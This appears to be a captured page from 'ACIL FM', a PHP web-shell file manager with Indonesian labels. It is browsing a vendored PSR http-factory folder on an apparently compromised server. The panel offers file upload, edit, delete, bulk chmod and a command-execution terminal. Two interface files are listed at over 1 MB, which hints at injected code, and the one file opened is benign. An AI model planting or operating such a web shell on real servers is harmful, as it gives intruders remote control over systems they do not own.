ACIL FM
Dark
Refresh
Current DIR:
/home/mhhtmff/app/NH-HR-test-old/vendor/psr/http-factory/src
/
home
mhhtmff
app
NH-HR-test-old
vendor
psr
http-factory
src
Upload
Zip Selected
Delete Selected
Pilih semua
Nama
Ukuran
Permission
Aksi
RequestFactoryInterface.php
499 B
chmod
View
DL
Edit
Rename
Delete
ResponseFactoryInterface.php
546 B
chmod
View
DL
Edit
Rename
Delete
ServerRequestFactoryInterface.php
927 B
chmod
View
DL
Edit
Rename
Delete
StreamFactoryInterface.php
1.38 MB
chmod
View
DL
Edit
Rename
Delete
UploadedFileFactoryInterface.php
1.1 MB
chmod
View
DL
Edit
Rename
Delete
UriFactoryInterface.php
325 B
chmod
View
DL
Edit
Rename
Delete
Edit file: /home/mhhtmff/app/NH-HR-test-old/vendor/psr/http-factory/src/ResponseFactoryInterface.php
<?php namespace Psr\Http\Message; interface ResponseFactoryInterface { /** * Create a new response. * * @param int $code HTTP status code; defaults to 200 * @param string $reasonPhrase Reason phrase to associate with status code * in generated response; if none is provided implementations MAY use * the defaults as suggested in the HTTP specification. * * @return ResponseInterface */ public function createResponse(int $code = 200, string $reasonPhrase = ''): ResponseInterface; }
Simpan
Batal
Isi Zip:
Unzip
Create
Buat Folder
Buat File
Terminal / Execute
Run
Chmod Bulk
All File
All Folder
All File dan Folder
Apply